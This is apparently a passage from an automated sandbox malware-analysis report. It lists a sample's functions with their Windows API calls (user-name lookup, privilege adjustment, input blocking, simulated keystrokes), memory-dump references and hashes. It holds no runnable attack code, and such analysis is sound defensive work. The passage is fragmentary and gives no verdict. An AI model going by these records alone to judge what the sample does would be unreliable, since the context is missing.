                                                                                                                        • GetCurrentProcess.KERNEL32(005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D09
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D10
                                                                                                                        • ExitProcess.KERNEL32 ref: 00534D22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
                                                                                                                        • Instruction ID: ecd0645cbbe328e136bc984cf64a200a30c7cdb28f7f02806e61409061b09998
                                                                                                                        • Opcode Fuzzy Hash: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
                                                                                                                        • Instruction Fuzzy Hash: 2FE0B631000149ABCF11AF54DD09A593F69FB92785F104814FC059A132CB35ED46DE80
                                                                                                                        Function 0054C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: /
                                                                                                                        • API String ID: 0-2043925204
                                                                                                                        • Opcode ID: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
                                                                                                                        • Instruction ID: fb6652b98a3781b2f5a12221a0e427bcc911ea91ff4d2165c1d4f8dfa6b6fc82
                                                                                                                        • Opcode Fuzzy Hash: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
                                                                                                                        • Instruction Fuzzy Hash: 7E410376901219ABCB209EB9CC89EFB7FB8FBC4318F504669F905D7180E6709D818B50
                                                                                                                        Function 0056D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0056D28C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID: X64
                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                        • Opcode ID: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
                                                                                                                        • Instruction ID: 34cacf5799088c056a9b5001acc38c10fcd8f24555b7ad87b395c2364a787781
                                                                                                                        • Opcode Fuzzy Hash: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
                                                                                                                        • Instruction Fuzzy Hash: 84D0CAB880116DEACB94CBA0EC8CDDEBBBCBB15305F100A92F506A2040EB3496489F20
                                                                                                                        Function 0053CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                        • Instruction ID: fcaf572f7ff181801ed2caa820e665f338e686476372e5d8e27cefae35fad23e
                                                                                                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                        • Instruction Fuzzy Hash: E8020B72E002199BDF14CFA9C8906ADBFF5FF88314F25816AD819FB285D731AD418B94
                                                                                                                        Function 0051CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Variable is not of type 'Object'.$p#^
                                                                                                                        • API String ID: 0-3707816926
                                                                                                                        • Opcode ID: 38ebca3518ea875ca29a7a756ba555f614a46d81e7587c365b77c3661e333c5d
                                                                                                                        • Instruction ID: 2807d7fc1836201bd9873582010fc7f00350088419aac3f565dcc528cbf25a3d
                                                                                                                        • Opcode Fuzzy Hash: 38ebca3518ea875ca29a7a756ba555f614a46d81e7587c365b77c3661e333c5d
                                                                                                                        • Instruction Fuzzy Hash: 1C32C030940219DFEF14DF90D885AEEBFB9FF45304F108459E806AB292D736AD86CB60
                                                                                                                        Function 005868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00586918
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00586961
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
                                                                                                                        • Instruction ID: 92dfe15808c49cd0ccfba3780411d71d20029e8ed3f7a5579bcaf8d9de36e887
                                                                                                                        • Opcode Fuzzy Hash: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
                                                                                                                        • Instruction Fuzzy Hash: D71190356042019FD710DF29D489A16BFE5FF89328F14C699E8699F7A2CB30EC45CB91
                                                                                                                        Function 005837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837E4
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
                                                                                                                        • Instruction ID: a6f8d38a89109b4b3722f9ac3bc4949022bce98d14447c11d8e8f71cdf397620
                                                                                                                        • Opcode Fuzzy Hash: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
                                                                                                                        • Instruction Fuzzy Hash: 7DF0EC706042152AE71067654C4DFDB3F9DFFC5B61F000175F905E2281D9609D48C7B0
                                                                                                                        Function 0057B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0057B25D
                                                                                                                        • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 0057B270
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3536248340-0
                                                                                                                        • Opcode ID: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
                                                                                                                        • Instruction ID: fa89f0b1796bb0ab1996e96e381df4b7cf9068d0bd5d1a0053f1d3c435a53079
                                                                                                                        • Opcode Fuzzy Hash: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
                                                                                                                        • Instruction Fuzzy Hash: 8CF01D7580424DABEB059FA0D805BBE7FB4FF09309F008409F955A5192C3798615AF94
                                                                                                                        Function 005710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
                                                                                                                        • CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: 9005e2f5a61d20b84e55e0179415a49c8394018d45fec87ef8c8283846fa8433
                                                                                                                        • Instruction ID: a9e1315f29f48ef04729aaa2af4eb85710bee989828662f9d1c3b48f999a4b77
                                                                                                                        • Opcode Fuzzy Hash: 9005e2f5a61d20b84e55e0179415a49c8394018d45fec87ef8c8283846fa8433
                                                                                                                        • Instruction Fuzzy Hash: 52E04F32004611AFE7252B11FC09E777FA9FF05310B10882EF4A6804B1DB626C90EB14
                                                                                                                        Function 0054676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00546766,?,?,00000008,?,?,0054FEFE,00000000), ref: 00546998
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
                                                                                                                        • Instruction ID: e93db8e4fcc023ba353d75c78951ea72e99b9ec9bab419e8e81d22aa8d84caec
                                                                                                                        • Opcode Fuzzy Hash: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
                                                                                                                        • Instruction Fuzzy Hash: 22B15B31610609DFD719CF28C48ABA57FE0FF46368F258658E899CF2A2C335E991CB41
                                                                                                                        Function 0052B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
                                                                                                                        • Instruction ID: 5c5ea13b49c66f16d1b63a57e8fba0a420e47a1751b90403a6d7de34746e4853
                                                                                                                        • Opcode Fuzzy Hash: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
                                                                                                                        • Instruction Fuzzy Hash: 06126F75A002299BDF14DF58D8806FEBBF5FF59310F14859AE849EB291DB309E81CB90
                                                                                                                        Function 0058EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • BlockInput.USER32(00000001), ref: 0058EABD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockInput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3456056419-0
                                                                                                                        • Opcode ID: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
                                                                                                                        • Instruction ID: e0f9a164f958f0ca17671cc39ec2c663608b09c8ba1b3d21dd89983a255078c8
                                                                                                                        • Opcode Fuzzy Hash: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
                                                                                                                        • Instruction Fuzzy Hash: EAE01A312002059FE710EF59D809E9ABFE9BF99760F008416FC49D7351DA70E8818B90
                                                                                                                        Function 005309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005303EE), ref: 005309DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
                                                                                                                        • Instruction ID: 6731236b3270fc932bb6af9d12ce81b37ddfd2a7c636efd81943a63c572f10a7
                                                                                                                        • Opcode Fuzzy Hash: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Function 0053781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction ID: c72c856620d185eec990f30792e31fc344d2dd9885a31418fd5a459ee12330fe
                                                                                                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction Fuzzy Hash: EF516CF2E0C74E6BDB384568485E7BEAFC5BB5E340F180A49E982D7382C615DE01D355
                                                                                                                        Function 00582046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0&^
                                                                                                                        • API String ID: 0-2485633877
                                                                                                                        • Opcode ID: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
                                                                                                                        • Instruction ID: efdc774adaccca72eb9060afdade9a38d72b28871f9316ceea658329a6bf2281
                                                                                                                        • Opcode Fuzzy Hash: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
                                                                                                                        • Instruction Fuzzy Hash: DE21D5326206518BDB2CCE79C82767A77E9B7A4310F14862EE4A7D73D0DE75A904DB80
                                                                                                                        Function 00546DD9 Relevance: .6, Instructions: 637COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
                                                                                                                        • Instruction ID: 538f5619cd2a7d3531932885f1cc1bcf4285ae1ba0609ecf9c2ad259a2c2a61d
                                                                                                                        • Opcode Fuzzy Hash: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
                                                                                                                        • Instruction Fuzzy Hash: 28324431D28F054EDB639634C8223756A8DAFBB3C9F15C737E81AB59A6EB28D4835100
                                                                                                                        Function 0052CC39 Relevance: .6, Instructions: 635COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
